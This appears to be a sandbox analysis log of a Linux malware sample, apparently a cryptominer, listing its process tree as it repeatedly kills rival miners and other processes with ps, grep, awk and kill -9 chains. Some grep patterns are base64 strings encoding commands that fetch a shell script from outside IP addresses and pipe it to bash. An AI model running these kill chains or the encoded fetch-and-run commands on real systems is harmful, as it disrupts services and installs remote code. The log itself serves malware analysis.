/usr/bin/awkawk "{print \$2}"2⤵PID:1837
/bin/grepgrep -v grep2⤵PID:1836
/bin/grepgrep ./oka2⤵PID:1835
/bin/psps aux2⤵PID:1834
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1843 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1842
/bin/grepgrep -v grep2⤵PID:1841
/bin/grepgrep "postgres: autovacum"2⤵PID:1840
/bin/psps aux2⤵PID:1839
/bin/grepgrep -v proxymap2⤵PID:1850
/bin/grepgrep -v postgres2⤵PID:1851
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1855
/bin/grepgrep -v postgrey2⤵PID:1852
/bin/grepgrep -v kinsing2⤵PID:1853
/usr/bin/awkawk "{print \$2}"2⤵PID:1854
/bin/grepgrep -v php-fpm2⤵PID:1849
/bin/grepgrep -v "("2⤵PID:1848
/bin/grepgrep -v "\\["2⤵PID:1847
/bin/grepgrep -v bin2⤵PID:1846
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1845
/bin/psps ax -o "command,pid" -www2⤵PID:1844
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1866
/usr/local/sbin/killkill -9 12643⤵PID:1867
/usr/local/bin/killkill -9 12643⤵PID:1867
/usr/sbin/killkill -9 12643⤵PID:1867
/usr/bin/killkill -9 12643⤵PID:1867
/sbin/killkill -9 12643⤵PID:1867
/bin/killkill -9 12643⤵PID:1867
/bin/grepgrep -v postgres2⤵PID:1863
/bin/grepgrep -v postgrey2⤵PID:1864
/usr/bin/awkawk "{print \$2}"2⤵PID:1865
/bin/grepgrep -v php-fpm2⤵PID:1861
/bin/grepgrep -v "("2⤵PID:1860
/bin/grepgrep -v proxymap2⤵PID:1862
/bin/grepgrep -v "\\["2⤵PID:1859
/bin/grepgrep -v bin2⤵PID:1858
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1857
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1856 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1878
/usr/bin/awkawk "{print \$1}"2⤵PID:1877
/bin/grepgrep -v postgrey2⤵PID:1876
/bin/grepgrep -v postgres2⤵PID:1875
/bin/grepgrep -v proxymap2⤵PID:1874
/bin/grepgrep -v php-fpm2⤵PID:1873
/bin/grepgrep -v "("2⤵PID:1872
/bin/grepgrep -v "\\["2⤵PID:1871
/bin/grepgrep -v bin2⤵PID:1870
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1869
/bin/psps ax2⤵PID:1868
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1883
/usr/bin/awkawk "{print \$2}"2⤵PID:1882
/bin/grepgrep /tmp/sscks2⤵PID:1881
/bin/grepgrep -v grep2⤵PID:1880
/bin/psps aux2⤵
- Reads CPU attributes
PID:1879 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1888
/usr/bin/awkawk "{print \$2}"2⤵PID:1887
/bin/grepgrep -v grep2⤵PID:1886
/bin/grepgrep "sleep 60"2⤵PID:1885
/bin/psps aux2⤵PID:1884
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1893
/usr/bin/awkawk "{print \$2}"2⤵PID:1892
/bin/grepgrep -v grep2⤵PID:1891
/bin/grepgrep ./crun2⤵PID:1890
/bin/psps aux2⤵PID:1889
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1898
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1897
/bin/grepgrep -v grep2⤵PID:1896
/bin/grepgrep -vw kdevtmpfsi2⤵PID:1895
/bin/psps aux2⤵PID:1894
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1903
/usr/bin/awkawk "{print \$2}"2⤵PID:1902
/bin/grepgrep :33332⤵PID:1901
/bin/grepgrep -v grep2⤵PID:1900
/bin/psps aux2⤵PID:1899
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1908 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1907
/bin/grepgrep :55552⤵PID:1906
/bin/grepgrep -v grep2⤵PID:1905
/bin/psps aux2⤵
- Reads CPU attributes
PID:1904 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1913
/usr/bin/awkawk "{print \$2}"2⤵PID:1912
/bin/grepgrep "kworker -c\\"2⤵PID:1911
/bin/grepgrep -v grep2⤵PID:1910
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1909 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1918
/usr/bin/awkawk "{print \$2}"2⤵PID:1917
/bin/grepgrep log_2⤵PID:1916
/bin/grepgrep -v grep2⤵PID:1915
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1914 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1923
/usr/bin/awkawk "{print \$2}"2⤵PID:1922
/bin/grepgrep systemten2⤵PID:1921
/bin/grepgrep -v grep2⤵PID:1920
/bin/psps aux2⤵
- Reads CPU attributes
PID:1919 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1928
/usr/local/sbin/killkill -9 143⤵PID:1929
/usr/local/bin/killkill -9 143⤵PID:1929
/usr/sbin/killkill -9 143⤵PID:1929
/usr/bin/killkill -9 143⤵PID:1929
/sbin/killkill -9 143⤵PID:1929
/bin/killkill -9 143⤵
- Reads CPU attributes
PID:1929 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1927
/bin/grepgrep netns2⤵PID:1926
/bin/grepgrep -v grep2⤵PID:1925
/bin/psps aux2⤵PID:1924
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1934
/usr/bin/awkawk "{print \$2}"2⤵PID:1933
/bin/grepgrep voltuned2⤵PID:1932
/bin/grepgrep -v grep2⤵PID:1931
/bin/psps aux2⤵PID:1930
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1939
/usr/bin/awkawk "{print \$2}"2⤵PID:1938
/bin/grepgrep darwin2⤵PID:1937
/bin/grepgrep -v grep2⤵PID:1936
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1935 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1944
/usr/bin/awkawk "{print \$2}"2⤵PID:1943
/bin/grepgrep /tmp/dl2⤵PID:1942
/bin/grepgrep -v grep2⤵PID:1941
/bin/psps aux2⤵
- Reads runtime system information
PID:1940 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1949
/usr/bin/awkawk "{print \$2}"2⤵PID:1948
/bin/grepgrep /tmp/ddg2⤵PID:1947
/bin/grepgrep -v grep2⤵PID:1946
/bin/psps aux2⤵PID:1945
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1954 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1953
/bin/grepgrep /tmp/pprt2⤵PID:1952
/bin/grepgrep -v grep2⤵PID:1951
/bin/psps aux2⤵
- Reads CPU attributes
PID:1950 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1959
/usr/bin/awkawk "{print \$2}"2⤵PID:1958
/bin/grepgrep /tmp/ppol2⤵PID:1957
/bin/grepgrep -v grep2⤵PID:1956
/bin/psps aux2⤵PID:1955
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1964
/usr/bin/awkawk "{print \$2}"2⤵PID:1963
/bin/grepgrep "/tmp/65ccE*"2⤵PID:1962
/bin/grepgrep -v grep2⤵PID:1961
/bin/psps aux2⤵PID:1960
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1969
/usr/bin/awkawk "{print \$2}"2⤵PID:1968
/bin/grepgrep "/tmp/jmx*"2⤵PID:1967
/bin/grepgrep -v grep2⤵PID:1966
/bin/psps aux2⤵PID:1965
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1974
/usr/bin/awkawk "{print \$2}"2⤵PID:1973
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1972
/bin/grepgrep -v grep2⤵PID:1971
/bin/psps aux2⤵PID:1970
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1977
/bin/grepgrep -v grep2⤵PID:1976
/bin/psps aux2⤵
- Reads runtime system information
PID:1975 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
/bin/grepgrep -v grep2⤵PID:1981
/bin/psps aux2⤵PID:1980
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1989
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
/bin/grepgrep -v grep2⤵PID:1986
/bin/psps aux2⤵PID:1985
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1994 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
/bin/grepgrep -v grep2⤵PID:1991
/bin/psps aux2⤵PID:1990
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
/bin/grepgrep 86s.jpg2⤵PID:1997
/bin/grepgrep -v grep2⤵PID:1996
/bin/psps aux2⤵
- Reads runtime system information
PID:1995 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2004
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
/bin/grepgrep aGTSGJJp2⤵PID:2002
/bin/grepgrep -v grep2⤵PID:2001
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2000 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2009
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
/bin/grepgrep nMrfmnRa2⤵PID:2007
/bin/grepgrep -v grep2⤵PID:2006
/bin/psps aux2⤵
- Reads runtime system information
PID:2005 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
/bin/grepgrep PuNY5tm22⤵PID:2012
/bin/grepgrep -v grep2⤵PID:2011
/bin/psps aux2⤵PID:2010
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2019
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
/bin/grepgrep I0r8Jyyt2⤵PID:2017
/bin/grepgrep -v grep2⤵PID:2016
/bin/psps aux2⤵PID:2015
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
/bin/grepgrep AgdgACUD2⤵PID:2022
/bin/grepgrep -v grep2⤵PID:2021
/bin/psps aux2⤵
- Reads CPU attributes
PID:2020 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2029
/usr/bin/awkawk "{print \$2}"2⤵PID:2028
/bin/grepgrep uiZvwxG82⤵PID:2027
/bin/grepgrep -v grep2⤵PID:2026
/bin/psps aux2⤵
- Reads runtime system information
PID:2025 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2034
/usr/bin/awkawk "{print \$2}"2⤵PID:2033
/bin/grepgrep hahwNEdB2⤵PID:2032
/bin/grepgrep -v grep2⤵PID:2031
/bin/psps aux2⤵PID:2030
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2039 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2038
/bin/grepgrep BtwXn5qH2⤵PID:2037
/bin/grepgrep -v grep2⤵PID:2036
/bin/psps aux2⤵
- Reads CPU attributes
PID:2035 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2044 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2043
/bin/grepgrep 3XEzey2T2⤵PID:2042
/bin/grepgrep -v grep2⤵PID:2041
/bin/psps aux2⤵PID:2040
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2049
/usr/bin/awkawk "{print \$2}"2⤵PID:2048
/bin/grepgrep t2tKrCSZ2⤵PID:2047
/bin/grepgrep -v grep2⤵PID:2046
/bin/psps aux2⤵
- Reads runtime system information
PID:2045 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2054
/usr/bin/awkawk "{print \$2}"2⤵PID:2053
/bin/grepgrep HD7fcBgg2⤵PID:2052
/bin/grepgrep -v grep2⤵PID:2051
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2050 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2059
/usr/bin/awkawk "{print \$2}"2⤵PID:2058
/bin/grepgrep zXcDajSs2⤵PID:2057
/bin/grepgrep -v grep2⤵PID:2056
/bin/psps aux2⤵
- Reads runtime system information
PID:2055 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
/usr/bin/awkawk "{print \$2}"2⤵PID:2063
/bin/grepgrep 3lmigMo2⤵PID:2062
/bin/grepgrep -v grep2⤵PID:2061
/bin/psps aux2⤵PID:2060
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2069
/usr/bin/awkawk "{print \$2}"2⤵PID:2068
/bin/grepgrep AkMK4A22⤵PID:2067
/bin/grepgrep -v grep2⤵PID:2066
/bin/psps aux2⤵PID:2065
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2074
/usr/bin/awkawk "{print \$2}"2⤵PID:2073
/bin/grepgrep AJ2AkKe2⤵PID:2072
/bin/grepgrep -v grep2⤵PID:2071
/bin/psps aux2⤵PID:2070
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2079
/usr/bin/awkawk "{print \$2}"2⤵PID:2078
/bin/grepgrep HiPxCJRS2⤵PID:2077
/bin/grepgrep -v grep2⤵PID:2076
/bin/psps aux2⤵PID:2075
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2084
/usr/bin/awkawk "{print \$2}"2⤵PID:2083
/bin/grepgrep http_0xCC0302⤵PID:2082
/bin/grepgrep -v grep2⤵PID:2081
/bin/psps aux2⤵
- Reads runtime system information
PID:2080 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2089
/usr/bin/awkawk "{print \$2}"2⤵PID:2088
/bin/grepgrep http_0xCC0312⤵PID:2087
/bin/grepgrep -v grep2⤵PID:2086
/bin/psps aux2⤵PID:2085
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2094
/usr/bin/awkawk "{print \$2}"2⤵PID:2093
/bin/grepgrep http_0xCC0322⤵PID:2092
/bin/grepgrep -v grep2⤵PID:2091
/bin/psps aux2⤵
- Reads runtime system information
PID:2090 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2099
/usr/bin/awkawk "{print \$2}"2⤵PID:2098
/bin/grepgrep http_0xCC0332⤵PID:2097
/bin/grepgrep -v grep2⤵PID:2096
/bin/psps aux2⤵PID:2095
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2104
/usr/bin/awkawk "{print \$2}"2⤵PID:2103
/bin/grepgrep C4iLM4L2⤵PID:2102
/bin/grepgrep -v grep2⤵PID:2101
/bin/psps aux2⤵PID:2100
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2109
/usr/bin/awkawk "{print \$2}"2⤵PID:2108
/bin/grepgrep aziplcr72qjhzvin2⤵PID:2107
/bin/grepgrep -v grep2⤵PID:2106
/bin/psps aux2⤵
- Reads runtime system information
PID:2105 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2113
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2112
/bin/grepgrep -v grep2⤵PID:2111
/bin/psps aux2⤵PID:2110
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2118
/usr/bin/awkawk "{print \$2}"2⤵PID:2117
/bin/grepgrep /boot/vmlinuz2⤵PID:2116
/bin/grepgrep -v grep2⤵PID:2115
/bin/psps aux2⤵PID:2114
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2123
/usr/bin/awkawk "{print \$2}"2⤵PID:2122
/bin/grepgrep i4b503a52cc52⤵PID:2121
/bin/grepgrep -v grep2⤵PID:2120
/bin/psps aux2⤵PID:2119
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2128
/usr/bin/awkawk "{print \$2}"2⤵PID:2127
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2126
/bin/grepgrep -v grep2⤵PID:2125
/bin/psps aux2⤵
- Reads CPU attributes
PID:2124 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2133 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2132
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2131
/bin/grepgrep -v grep2⤵PID:2130
/bin/psps aux2⤵PID:2129
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2138
/usr/bin/awkawk "{print \$2}"2⤵PID:2137
/bin/grepgrep nqscheduler2⤵PID:2136
/bin/grepgrep -v grep2⤵PID:2135
/bin/psps aux2⤵
- Reads runtime system information
PID:2134 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2143
/usr/bin/awkawk "{print \$2}"2⤵PID:2142
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2141
/bin/grepgrep -v grep2⤵PID:2140
/bin/psps aux2⤵PID:2139
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2149 -
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2148
/bin/grepgrep "]"2⤵PID:2147
/bin/grepgrep -v aux2⤵PID:2146
/bin/grepgrep -v grep2⤵PID:2145
/bin/psps aux2⤵PID:2144
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2154 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2153
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2152
/bin/grepgrep -v grep2⤵PID:2151
/bin/psps aux2⤵
- Reads runtime system information
PID:2150 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2159
/usr/bin/awkawk "{print \$2}"2⤵PID:2158
/bin/grepgrep 0kwti6ut420t2⤵PID:2157
/bin/grepgrep -v grep2⤵PID:2156
/bin/psps aux2⤵
- Reads CPU attributes
PID:2155 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2164
/usr/bin/awkawk "{print \$2}"2⤵PID:2163
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2162
/bin/grepgrep -v grep2⤵PID:2161
/bin/psps aux2⤵PID:2160
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2171 -
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:2170
/bin/grepgrep -v _2⤵PID:2169
/bin/grepgrep -v -2⤵PID:2168
/bin/grepgrep -v /2⤵PID:2167
/bin/grepgrep -v grep2⤵PID:2166
/bin/psps aux2⤵PID:2165
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2176
/usr/bin/awkawk "{print \$2}"2⤵PID:2175
/bin/grepgrep "\\[^"2⤵PID:2174
/bin/grepgrep -v grep2⤵PID:2173
/bin/psps aux2⤵
- Reads CPU attributes
PID:2172 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2181
/usr/bin/awkawk "{print \$2}"2⤵PID:2180
/bin/grepgrep rsync2⤵PID:2179
/bin/grepgrep -v grep2⤵PID:2178
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2177 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2186
/usr/bin/awkawk "{print \$2}"2⤵PID:2185
/bin/grepgrep watchd0g2⤵PID:2184
/bin/grepgrep -v grep2⤵PID:2183
/bin/psps aux2⤵PID:2182
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2191
/usr/bin/awkawk "{print \$2}"2⤵PID:2190
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2189
/bin/grepgrep -v grep2⤵PID:2188
/bin/psps aux2⤵PID:2187
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2196 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2195
/bin/grepgrep -v grep2⤵PID:2193
/bin/psps aux2⤵
- Reads runtime system information
PID:2192 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2201
/usr/bin/awkawk "{print \$2}"2⤵PID:2200
/bin/grepgrep /tmp/java2⤵PID:2199
/bin/grepgrep -v grep2⤵PID:2198
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2197 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2206
/usr/bin/awkawk "{print \$2}"2⤵PID:2205
/bin/grepgrep gitee.com2⤵PID:2204
/bin/grepgrep -v grep2⤵PID:2203
/bin/psps aux2⤵PID:2202
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2211
/usr/bin/awkawk "{print \$2}"2⤵PID:2210
/bin/grepgrep /tmp/java2⤵PID:2209
/bin/grepgrep -v grep2⤵PID:2208
/bin/psps aux2⤵
- Reads runtime system information
PID:2207 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2216
/usr/bin/awkawk "{print \$2}"2⤵PID:2215
/bin/grepgrep -v grep2⤵PID:2213
/bin/psps aux2⤵PID:2212
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2221
/usr/bin/awkawk "{print \$2}"2⤵PID:2220
/bin/grepgrep -v grep2⤵PID:2218
/bin/psps aux2⤵PID:2217
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2226 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2225
/bin/grepgrep /dev/shm/z3.sh2⤵PID:2224
/bin/grepgrep -v grep2⤵PID:2223
/bin/psps aux2⤵PID:2222
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2231
/usr/bin/awkawk "{print \$2}"2⤵PID:2230
/bin/grepgrep kthrotlds2⤵PID:2229
/bin/grepgrep -v grep2⤵PID:2228
/bin/psps aux2⤵PID:2227
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2236
/usr/bin/awkawk "{print \$2}"2⤵PID:2235
/bin/grepgrep ksoftirqds2⤵PID:2234
/bin/grepgrep -v grep2⤵PID:2233
/bin/psps aux2⤵PID:2232
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2241
/usr/bin/awkawk "{print \$2}"2⤵PID:2240
/bin/grepgrep netdns2⤵PID:2239
/bin/grepgrep -v grep2⤵PID:2238
/bin/psps aux2⤵
- Reads CPU attributes
PID:2237 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2246
/usr/bin/awkawk "{print \$2}"2⤵PID:2245
/bin/grepgrep watchdogs2⤵PID:2244
/bin/grepgrep -v grep2⤵PID:2243
/bin/psps aux2⤵PID:2242
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2258
/bin/grepgrep -v postgresq12⤵PID:2256
/bin/grepgrep -v kdevtmpfsi2⤵PID:2255
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵PID:2257
/bin/grepgrep -v atd2⤵PID:2254
/bin/grepgrep -v apache22⤵PID:2253
/bin/grepgrep -v dblaunched2⤵PID:2252
/bin/grepgrep -v dblaunchs2⤵PID:2251
/bin/grepgrep -v dblaunch2⤵PID:2250
/bin/grepgrep -v root2⤵PID:2249
/bin/grepgrep -v grep2⤵PID:2248
/bin/psps aux2⤵PID:2247
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2264
/usr/bin/awkawk "{print \$2}"2⤵PID:2263
/bin/grepgrep " ps"2⤵PID:2262
/bin/grepgrep -v aux2⤵PID:2261
/bin/grepgrep -v grep2⤵PID:2260
/bin/psps aux2⤵PID:2259
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2269 -
/usr/bin/cutcut -c 9-152⤵PID:2268
/bin/grepgrep sync_supers2⤵PID:2267
/bin/grepgrep -v grep2⤵PID:2266
/bin/psps aux2⤵PID:2265
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2274
/usr/bin/cutcut -c 9-152⤵PID:2273
/bin/grepgrep cpuset2⤵PID:2272
/bin/grepgrep -v grep2⤵PID:2271
/bin/psps aux2⤵PID:2270
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2280
/usr/bin/awkawk "{print \$2}"2⤵PID:2279
/bin/grepgrep "x]"2⤵PID:2278
/bin/grepgrep -v aux2⤵PID:2277
/bin/grepgrep -v grep2⤵PID:2276
/bin/psps aux2⤵PID:2275
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2286
/usr/bin/awkawk "{print \$2}"2⤵PID:2285
/bin/grepgrep "sh] <"2⤵PID:2284
/bin/grepgrep -v aux2⤵PID:2283
/bin/grepgrep -v grep2⤵PID:2282
/bin/psps aux2⤵
- Reads runtime system information
PID:2281 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2292
/usr/bin/awkawk "{print \$2}"2⤵PID:2291
/bin/grepgrep " \\[]"2⤵PID:2290
/bin/grepgrep -v aux2⤵PID:2289
/bin/grepgrep -v grep2⤵PID:2288
/bin/psps aux2⤵
- Reads CPU attributes
PID:2287 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2297
/usr/bin/awkawk "{print \$2}"2⤵PID:2296
/bin/grepgrep /tmp/l.sh2⤵PID:2295
/bin/grepgrep -v grep2⤵PID:2294
/bin/psps aux2⤵
- Reads CPU attributes
PID:2293 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2302
/usr/bin/awkawk "{print \$2}"2⤵PID:2301
/bin/grepgrep /tmp/zmcat2⤵PID:2300
/bin/grepgrep -v grep2⤵PID:2299
/bin/psps aux2⤵PID:2298
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2307
/usr/bin/awkawk "{print \$2}"2⤵PID:2306
/bin/grepgrep hahwNEdB2⤵PID:2305
/bin/grepgrep -v grep2⤵PID:2304
/bin/psps aux2⤵PID:2303
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2312
/usr/bin/awkawk "{print \$2}"2⤵PID:2311
/bin/grepgrep CnzFVPLF2⤵PID:2310
/bin/grepgrep -v grep2⤵PID:2309
/bin/psps aux2⤵
- Reads CPU attributes
PID:2308 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2317
/usr/bin/awkawk "{print \$2}"2⤵PID:2316
/bin/grepgrep CvKzzZLs2⤵PID:2315
/bin/grepgrep -v grep2⤵PID:2314
/bin/psps aux2⤵PID:2313
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2322
/usr/bin/awkawk "{print \$2}"2⤵PID:2321
/bin/grepgrep aziplcr72qjhzvin2⤵PID:2320
/bin/grepgrep -v grep2⤵PID:2319
/bin/psps aux2⤵PID:2318
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2327
/usr/bin/awkawk "{print \$2}"2⤵PID:2326
/bin/grepgrep /tmp/udevd2⤵PID:2325
/bin/grepgrep -v grep2⤵PID:2324
/bin/psps aux2⤵
- Reads CPU attributes
PID:2323 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2332
/usr/bin/awkawk "{print \$2}"2⤵PID:2331
/bin/grepgrep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA2⤵PID:2330
/bin/grepgrep -v grep2⤵PID:2329
/bin/psps aux2⤵
- Reads runtime system information
PID:2328 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2337
/usr/bin/awkawk "{print \$2}"2⤵PID:2336
/bin/grepgrep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo2⤵PID:2335
/bin/grepgrep -v grep2⤵PID:2334
/bin/psps aux2⤵PID:2333
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2342
/usr/bin/awkawk "{print \$2}"2⤵PID:2341
/bin/grepgrep sustse2⤵PID:2340
/bin/grepgrep -v grep2⤵PID:2339
/bin/psps aux2⤵
- Reads CPU attributes
PID:2338 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2347
/usr/bin/awkawk "{print \$2}"2⤵PID:2346
/bin/grepgrep sustse32⤵PID:2345
/bin/grepgrep -v grep2⤵PID:2344
/bin/psps aux2⤵PID:2343
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2353
/usr/bin/awkawk "{print \$2}"2⤵PID:2352
